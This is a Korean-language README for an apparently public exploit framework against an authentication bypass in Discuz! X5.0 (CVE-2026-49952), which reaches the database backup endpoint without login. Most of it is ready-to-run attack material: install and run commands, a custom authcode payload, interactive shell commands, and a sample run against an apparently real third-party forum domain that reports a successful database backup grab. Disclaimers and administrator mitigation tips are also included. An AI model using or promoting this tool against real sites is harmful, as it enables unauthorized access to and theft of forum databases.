
Discuz! X5.0 인증 우회 익스플로잇 프레임워크 (CVE-2026-49952) - UC_KEY 암호화 오라클 토큰 재사용을 통해 인증 없이 데이터베이스 백업에 접근할 수 있게 하는 치명적인 취약점. CVSS 9.1. 버전 탐지, 다중 페이로드 공격, 대화형 셸 및 자동화된 익스플로잇을 지원하는 완전한 기능의 도구. 승인된 테스트에만 사용 가능.
⚡ CVE-2026-49952 | CVSS 9.1 (치명적) | 버전 1.0.0
Discuz! X5.0의 치명적인 인증 우회 취약점을 식별하고 시연하기 위해 설계된 전문 침투 테스트 도구입니다.
중요 공지 이 도구는 교육 목적과 허가된 보안 테스트만을 위해 제공됩니다. 절대 소유하지 않거나 명시적 테스트 허가가 없는 시스템에 이 도구를 사용하지 마십시오. 컴퓨터 시스템에 무단 액세스하는 것은 불법이며 비윤리적입니다. 저자는 이 도구의 오용이나 피해에 대해 책임을 지지 않습니다. 이 도구를 사용함으로써 귀하는 관련 법률 및 규정을 준수하는 데 동의하는 것입니다.
Discuz! X5.0 인증 우회 익스플로잇 프레임워크는 2026년 3월 20일부터 2026년 5월 1일 사이에 출시된 Discuz! X5.0 버전의 치명적인 인증 우회 취약점(CVE-2026-49952)을 식별하고 시연하기 위해 설계되었습니다.
이 취약점을 통해 인증되지 않은 공격자는 UC_KEY 암호화 오라클의 토큰 재사용을 악용하여 데이터베이스 백업 기능(dbbak.php)에 접근할 수 있으며, 잠재적으로 민감한 데이터베이스 내용이 노출될 수 있습니다.
🏆 CVSS 점수: 9.1 (치명적)
🔐 영향: 인증 우회
📂 접근: 데이터베이스 백업 파일
⚡ 복잡도: 낮음 (쉽게 악용 가능)
🎯 대상: Discuz! X5.0 (20260320 - 20260501)
취약점은 dbbak.php 엔드포인트에 존재하며, 토큰 검증 메커니즘이 UC_KEY 암호화 오라클에 의존합니다. 로그인 요청(member.php)에서 특정 페이로드를 조작함으로써 공격자는 유효한 인증 토큰을 획득할 수 있으며, 이 토큰을 재사용하여 적절한 인증 없이 데이터베이스 백업 기능에 접근할 수 있습니다.
❌ Discuz! X5.0 (20260320 - 20260501) - 취약
✅ Discuz! X5.0 (20260510+) - 수정됨
🔍 버전 탐지: 자동 핑거프린팅 및 Discuz! 버전 식별.
⚡ 다중 페이로드 공격: 여러 페이로드 변형의 병렬 테스트.
🖥️ 대화형 셸: 수동 익스플로잇을 위한 모든 기능을 갖춘 명령줄 인터페이스.
🚀 자동 익스플로잇: 최소한의 설정으로 원클릭 익스플로잇.
📊 결과 저장: 타임스탬프 파일로 익스플로잇 결과 내보내기.
🌐 프록시 지원: 네트워크 트래버설을 위한 HTTP/HTTPS 프록시 설정.
🎯 스레드 스캔: 성능 최적화를 위한 설정 가능한 스레드 수.
🎨 컬러 출력: 전문적인 색상 코드 터미널 출력.
🔐 SSL/TLS 지원: HTTP 및 HTTPS 대상 모두 처리.
🔄 세션 관리: 지속적인 세션 상태 유지.
📦 페이로드 커스터마이징: 사용자 정의 페이로드 삽입 지원.
🎯 대상 검증: 익스플로잇 전 Discuz! 설치 확인.
Python: 버전 3.7 이상
Pip: Python 패키지 관리자
# 저장소 클론
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework
# 필수 패키지 설치
pip install -r requirements.txt
# 설치 확인
python3 exploit.py --help
# Docker 이미지 빌드
docker build -t exploit .
# 컨테이너 실행
docker run -it --rm exploit http://target.com
# 간단한 익스플로잇
python3 exploit.py http://target.com
# 출력 파일 지정
python3 exploit.py http://target.com --output results.txt
# 디버깅용 상세 모드
python3 exploit.py http://target.com --verbose
# 프록시 및 사용자 정의 스레드 사용
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10
# 사용자 정의 페이로드
python3 exploit.py http://target.com --payload "admin|1|0|0"
python3 exploit.py http://discuz.eda.com.my
██████╗ ██╗███████╗██╗ ██╗███████╗███████╗██████╗
██╔══██╗██║██╔════╝██║ ██║╚══███╔╝╚══███╔╝╚════██╗
██║ ██║██║███████╗██║ ██║ ███╔╝ ███╔╝ █████╔╝
██║ ██║██║╚════██║██║ ██║ ███╔╝ ███╔╝ ██╔═══╝
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝
Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt
╔══════════════════════════════════════════════════════════╗
║ EXPLOIT SUCCESSFUL ║
╠══════════════════════════════════════════════════════════╣
║ Target: http://discuz.eda.com.my ║
║ Authcode: aBcDeFgHiJkLmNoPqRsT... ║
║ Status: Database backup accessed ║
║ Data Size: 24567 bytes ║
║ Saved to: discuz_exploit_20260724_143218.txt ║
╚══════════════════════════════════════════════════════════╝
수동 익스플로잇을 위해 대화형 셸을 시작합니다:
python3 discuz_exploit.py http://target.com --interactive
소유한 시스템이나 명시적 허가를 받은 시스템에서만 사용하세요.
테스트 전에 서면 승인을 받으세요.
책임 있는 공개 절차를 따르세요.
취약점을 공급업체에 적절히 보고하세요.
학습을 위해 격리된 실험실 환경에서 사용하세요.
승인 없이 프로덕션 시스템에 절대 사용하지 마세요.
악용된 데이터를 공개적으로 공유하지 마세요.
불법 활동이나 데이터 도용에 절대 사용하지 마세요.
테스트 중 데이터를 수정하거나 삭제하지 마세요.
동의 없이 절대 악용하지 마세요.
시스템 관리자용:
즉시 업데이트: Discuz! X5.0 (20260510+) 이상으로 업그레이드하세요.
엔드포인트 비활성화: 필요하지 않은 경우 dbbak.php를 임시로 비활성화하세요.
로그 모니터링: member.php 및 dbbak.php에 대한 의심스러운 접근을 감시하세요.
WAF 규칙: 웹 애플리케이션 방화벽 규칙을 구현하여 악성 요청을 차단하세요.
IP 화이트리스트: 백업 엔드포인트 접근을 신뢰할 수 있는 IP로 제한하세요.
Error: Failed to connect to target
Solutions:
• Check if target URL is correct
• Verify network connectivity
• Check for firewalls blocking access
• Try with proxy: --proxy http://your_proxy:port
• Ensure target is online and accessible
Error: Authentication failed or invalid authcode
Solutions:
• Ensure the target Discuz! version is vulnerable
• Try different payloads for authcode extraction
• Check for network issues or WAF interference
• Run in verbose mode (--verbose ) for more details
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다.
Copyright © 2026 Sudeepa Wanigarathna
이 소프트웨어 및 관련 문서 파일(이하 "소프트웨어")의 사본을 취득하는 모든 사람에게는 다음 조건에 따라 소프트웨어를 제한 없이 다룰 수 있는 권한이 무료로 부여됩니다. 여기에는 소프트웨어의 사용, 복사, 수정, 병합, 게시, 배포, 서브라이선스 및/또는 판매 권리와 소프트웨어를 제공받은 사람이 이를 수행할 수 있도록 허용하는 권리가 포함되나 이에 국한되지 않습니다.
위의 저작권 표시와 이 권한 표시는 소프트웨어의 모든 사본이나 주요 부분에 포함되어야 합니다.
소프트웨어는 "있는 그대로" 제공되며, 상품성, 특정 목적에의 적합성 및 비침해에 대한 보증을 포함하되 이에 국한되지 않는 어떤 종류의 명시적이든 묵시적이든 어떠한 보증도 없이 제공됩니다. 어떠한 경우에도 저자나 저작권 소유자는 계약, 불법 행위 또는 기타 행위로 인해 소프트웨어 또는 소프트웨어의 사용 또는 기타 거래로 인해 발생하는 모든 청구, 손해 또는 기타 책임에 대해 책임을 지지 않습니다.
저자: Sudeepa Wanigarathna | GitHub: @CerberusMrXi
⭐ 이 도구가 유용하다면 별표를 눌러주세요!
🔐 책임감 있게 사용하세요. 윤리적으로 행동하세요. 계속 배우세요.
| 속성 | 세부 정보 |
|---|
| 취약점 유형 | 인증 우회 |
| CVE ID | CVE-2026-49952 |
| CVSS 버전 | 3.1 |
| CVSS 점수 | 9.1 (치명적) |
| 공격 벡터 | 네트워크 |
| 공격 복잡도 | 낮음 |
| 필요 권한 | 없음 |
| 사용자 상호 작용 | 없음 |
| 기밀성 영향 | 높음 |
| 무결성 영향 | 높음 |
| 가용성 영향 | 높음 |
| 익스플로잇 코드 성숙도 | 기능적 |
| 수정 단계 | 공식 수정 가능 |
| 명령어 | 설명 | 예시 |
|---|
help | 사용 가능한 모든 명령어 표시 | help |
scan | Discuz! 버전 탐지 및 취약점 확인 | scan |
get [payload] | 인증 코드 추출 (선택적 사용자 정의 페이로드) | `get admin |
exploit [op] | 익스플로잇 실행 (기본값: backup) | exploit backup |
save | 결과를 파일로 저장 | save |
info | 세션 정보 표시 | info |
clear | 터미널 화면 지우기 | clear |
exit / quit | 대화형 셸 종료 | exit |